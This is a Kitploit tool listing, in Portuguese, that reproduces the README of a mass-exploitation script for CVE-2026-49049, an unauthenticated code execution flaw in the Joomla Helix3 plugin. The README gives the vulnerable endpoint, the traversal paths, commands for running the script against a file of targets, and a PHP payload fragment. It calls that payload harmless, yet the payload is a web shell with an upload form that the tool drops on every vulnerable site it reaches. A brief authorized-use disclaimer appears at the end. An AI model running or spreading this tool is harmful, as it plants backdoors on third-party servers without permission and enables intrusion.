Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-49049 — Scanner de vulnerabilidades em massa para CVE-2026-49049 – Execução Remota de Código Não Autenticada no plugin Joomla Helix3. Multithread, detecta payloads PHP executados e brutos. | Kitploit
Ferramentas/GitHubGitHub/jenderal92/cve-2026-49049
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebGeração de PayloadsExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

Scanner de vulnerabilidades em massa para CVE-2026-49049 – Execução Remota de Código Não Autenticada no plugin Joomla Helix3. Multithread, detecta payloads PHP executados e brutos.

Ver Repositório
113há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner em Massa CVE-2026-49049

Scanner em massa de vulnerabilidades para CVE-2026-49049 - Execução Remota de Código sem Autenticação no Framework Helix3 do Joomla.


📌 Descrição

Esta ferramenta verifica vários sites Joomla para a vulnerabilidade CVE-2026-49049 encontrada no plugin Helix3. A vulnerabilidade permite que um atacante não autenticado envie e execute código PHP arbitrário no servidor alvo.

O scanner tenta:

  1. Explorar o endpoint com_ajax com o plugin helix3.
  2. Enviar um arquivo PHP inofensivo de info/payload.
  3. Detectar se o arquivo é executado ou apenas armazenado como PHP bruto.

⚡ Recursos

  • Varredura em massa com multithreading (20 threads por padrão).
  • Dois modos de detecção:
    • ✅ Vulnerável – o código PHP é executado (RCE bem-sucedido).
    • ⚠️ PHP bruto – o arquivo é enviado, mas não executado (divulgação de código).
  • Geração automática de payload com nomes de arquivos aleatórios.
  • Saída salva em arquivos separados para análise posterior.
  • Leve e rápido com tratamento de timeout.

📦 Pré-requisitos

  • Python 2.7
  • Biblioteca requests
root@kitploit:~
pip install requests

🛠 Instalação

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 Uso

root@kitploit:~
python2 cve-2026-49049.py targets.txt

Formato de Entrada

Cada linha em targets.txt deve conter um domínio ou IP:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

Arquivos de Saída

Arquivo Descrição results.txt URLs vulneráveis onde o payload foi executado rez.txt URLs onde o payload foi enviado, mas não executado (PHP bruto)


Exemplo de Saída

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ Configuração

Você pode ajustar as seguintes variáveis dentro do script:

Variável Padrão Descrição THREADS 20 Número de threads concorrentes PATHS ['../../../', '../../../../'] Caminhos de travessia de diretório TIMEOUT 5 Tempo limite de requisição HTTP RESULT_FILE 'results.txt' Arquivo de saída para sites vulneráveis RAW_RESULT_FILE 'rez.txt' Arquivo de saída para sites com PHP bruto


🧠 Como Funciona

O script envia uma requisição POST para:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

com um payload que:

  1. Especifica um caminho de travessia de diretório (ex.: ../../../)
  2. Envia um arquivo PHP com um nome aleatório
  3. Contém um web shell / página de info simples

Em seguida, verifica se o arquivo está acessível e se o código PHP é executado ou apenas exibido como texto puro.

Exemplo de Payload

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ Aviso de Isenção

Esta ferramenta é apenas para fins educacionais e de testes autorizados.

O uso não autorizado desta ferramenta contra sistemas que você não possui ou sem permissão explícita para testar é ilegal. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.

Mais Avisos: Você pode ver o aviso na capa de Jenderal92. Você pode verificá-lo AQUI !!!


Baixar ferramenta